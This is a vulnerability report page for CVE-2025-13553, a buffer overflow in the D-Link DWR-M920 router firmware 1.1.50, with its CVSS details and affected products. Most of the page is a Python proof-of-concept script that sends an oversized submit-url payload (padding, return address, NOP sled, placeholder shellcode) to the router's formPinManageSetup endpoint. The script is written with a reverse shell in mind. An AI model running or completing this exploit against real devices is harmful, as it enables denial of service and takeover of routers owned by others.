Security Vulnerability Report
CVE-2025-13553 CVSS 8.8 HIGH

CVE-2025-13553

Published: 2025-11-23 14:15:47
Last Modified: 2025-11-26 17:22:52

Description

A weakness has been identified in D-Link DWR-M920 1.1.50. It affects the function sub_41C7FC of the file /boafrm/formPinManageSetup. Manipulating the argument submit-url causes a buffer overflow. The attack can be initiated remotely. An exploit has been made available to the public and could be used.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dwr-m920:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DWR-M920 < 1.1.50 (firmware version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-13553 PoC - D-Link DWR-M920 Buffer Overflow
Dork: DWR-M920 formPinManageSetup buffer overflow
"""
import requests
import sys
import argparse


def exploit_dwr_m920(target_ip, target_port=80, lhost=None, lport=4444):
    """
    Exploit buffer overflow in /boafrm/formPinManageSetup
    target: Target IP address
    lhost: Attacker IP for reverse shell (optional)
    lport: Attacker port for reverse shell (optional)
    """
    url = f"http://{target_ip}:{target_port}/boafrm/formPinManageSetup"

    # Buffer overflow payload construction
    # Pattern: padding + return address + nop sled + shellcode
    buffer_size = 1000

    # Generate cyclic pattern for offset calculation
    # In real exploitation, use pattern_create and pattern_offset
    padding = b'A' * 500

    # Return address (needs to be adjusted based on firmware version)
    # For 1.1.50, use gadgets from libc or firmware binary
    ret_addr = b'\x42\x42\x42\x42'  # Placeholder - needs to point to shellcode

    # NOP sled for reliability
    nop_sled = b'\x90' * 100

    # Simple execve /bin/sh shellcode for MIPS (little-endian)
    # This is a placeholder - use msfvenom for actual MIPS shellcode
    shellcode = b'\x66\x66\x66\x66'  # Placeholder shellcode

    payload = padding + ret_addr + nop_sled + shellcode

    # Send malicious request
    data = {
        'submit-url': payload.decode('latin-1'),
        'submit-button': 'save'
    }

    print(f"[*] Sending exploit to {url}")
    print(f"[*] Payload size: {len(payload)} bytes")

    try:
        response = requests.post(url, data=data, timeout=10)
        print(f"[!] Response status: {response.status_code}")
        print(f"[!] Target may be vulnerable - check for crash or shell")
    except requests.exceptions.Timeout:
        print("[!] Request timed out - likely crashed the service")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-13553 Exploit')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', default=80, help='Target port (default: 80)')
    args = parser.parse_args()
    exploit_dwr_m920(args.target, args.port)
```

References

Raw JSON Data
